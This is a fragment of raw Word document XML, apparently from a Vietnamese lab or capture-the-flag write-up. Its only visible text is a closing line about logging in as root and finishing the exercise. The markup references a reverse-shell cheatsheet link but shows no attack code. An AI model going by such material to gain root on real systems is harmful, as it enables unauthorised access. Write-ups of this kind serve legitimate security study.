    <w:p w14:paraId="50206FD7" w14:textId="4E87F2E3" w:rsidR="008B0DA0" w:rsidRDefault="008B0DA0">
      <w:r w:rsidRPr="008B0DA0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="507DD5B8" wp14:editId="067CC140">
            <wp:extent cx="3972479" cy="1848108"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10038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4133" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3972479" cy="1848108"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABFC38D" w14:textId="404E9FEC" w:rsidR="008B0DA0" w:rsidRDefault="008B0DA0">
      <w:r>
        <w:t xml:space="preserve">Đăng nhập vào root và xong </w:t>
      </w:r>
      <w:r w:rsidR="00933279">
        <w:t>bài.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F754A8" w14:textId="77777777" w:rsidR="00E73BEC" w:rsidRPr="007A386A" w:rsidRDefault="00E73BEC"/>
    <w:sectPr w:rsidR="00E73BEC" w:rsidRPr="007A3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46E78"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A09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B5C03"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="509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15CDA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5CFED60E"/>
    <w:lvl w:ilvl="0" w:tplc="9CB09D9E">
      <w:start w:val="6"/>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5739824">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="530729453">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="36452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C9"/>
    <w:rsid w:val="00012B0A"/>
    <w:rsid w:val="0002152D"/>
    <w:rsid w:val="001149A9"/>
    <w:rsid w:val="00127DA2"/>
    <w:rsid w:val="00191222"/>
    <w:rsid w:val="001962A0"/>
    <w:rsid w:val="001A3776"/>
    <w:rsid w:val="001D7F60"/>
    <w:rsid w:val="001F61E7"/>
    <w:rsid w:val="00217E5A"/>
    <w:rsid w:val="00254C07"/>
    <w:rsid w:val="00297CFD"/>
    <w:rsid w:val="0030384F"/>
    <w:rsid w:val="00324114"/>
    <w:rsid w:val="00334815"/>
    <w:rsid w:val="003446A4"/>
    <w:rsid w:val="00363E9D"/>
    <w:rsid w:val="00366376"/>
    <w:rsid w:val="00390A32"/>
    <w:rsid w:val="00390E72"/>
    <w:rsid w:val="00394B40"/>
    <w:rsid w:val="00397D1E"/>
    <w:rsid w:val="003A6C74"/>
    <w:rsid w:val="003E30A6"/>
    <w:rsid w:val="003F6593"/>
    <w:rsid w:val="004235C9"/>
    <w:rsid w:val="004269C7"/>
    <w:rsid w:val="004D111E"/>
    <w:rsid w:val="0052437F"/>
    <w:rsid w:val="00591DBA"/>
    <w:rsid w:val="005A7021"/>
    <w:rsid w:val="00603D86"/>
    <w:rsid w:val="00660DAD"/>
    <w:rsid w:val="00671AA1"/>
    <w:rsid w:val="00680FBC"/>
    <w:rsid w:val="006953AE"/>
    <w:rsid w:val="006D3244"/>
    <w:rsid w:val="006E0A0C"/>
    <w:rsid w:val="00782586"/>
    <w:rsid w:val="00790F5B"/>
    <w:rsid w:val="007A2BD9"/>
    <w:rsid w:val="007A2CA3"/>
    <w:rsid w:val="007A386A"/>
    <w:rsid w:val="007D3F69"/>
    <w:rsid w:val="007F0B1E"/>
    <w:rsid w:val="00805977"/>
    <w:rsid w:val="00836DDA"/>
    <w:rsid w:val="00871596"/>
    <w:rsid w:val="0088254F"/>
    <w:rsid w:val="008A24CD"/>
    <w:rsid w:val="008B0DA0"/>
    <w:rsid w:val="008D4B0D"/>
    <w:rsid w:val="008F27F2"/>
    <w:rsid w:val="009123FD"/>
    <w:rsid w:val="00933279"/>
    <w:rsid w:val="009338E1"/>
    <w:rsid w:val="0094457A"/>
    <w:rsid w:val="00982583"/>
    <w:rsid w:val="0099324F"/>
    <w:rsid w:val="009E2EB5"/>
    <w:rsid w:val="00A0050D"/>
    <w:rsid w:val="00A26AE9"/>
    <w:rsid w:val="00A83992"/>
    <w:rsid w:val="00A8452E"/>
    <w:rsid w:val="00A9284B"/>
    <w:rsid w:val="00AA3866"/>
    <w:rsid w:val="00B23782"/>
    <w:rsid w:val="00B3383F"/>
    <w:rsid w:val="00B64A19"/>
    <w:rsid w:val="00C41422"/>
    <w:rsid w:val="00C52493"/>
    <w:rsid w:val="00C73990"/>
    <w:rsid w:val="00CA4C4D"/>
    <w:rsid w:val="00CD70A6"/>
    <w:rsid w:val="00D06AA9"/>
    <w:rsid w:val="00D3085A"/>
    <w:rsid w:val="00D30C0E"/>
    <w:rsid w:val="00D63B79"/>
    <w:rsid w:val="00E1506F"/>
    <w:rsid w:val="00E32AC0"/>
    <w:rsid w:val="00E46503"/>
    <w:rsid w:val="00E73BEC"/>
    <w:rsid w:val="00EE03D5"/>
    <w:rsid w:val="00F163E8"/>
    <w:rsid w:val="00F317B7"/>
    <w:rsid w:val="00FA0A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8310"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{55F0C415-F473-45B9-BAF4-A994FE686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235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235C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34815"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00334815"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00A005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624302">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="536743085">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="922684235">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="117750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swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/" TargetMode="External"/><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1086</TotalTime>
  <Pages>12</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cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-11-03T03:47:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-15T00:47:00Z</dcterms:modified>
</cp:coreProperties>
</file>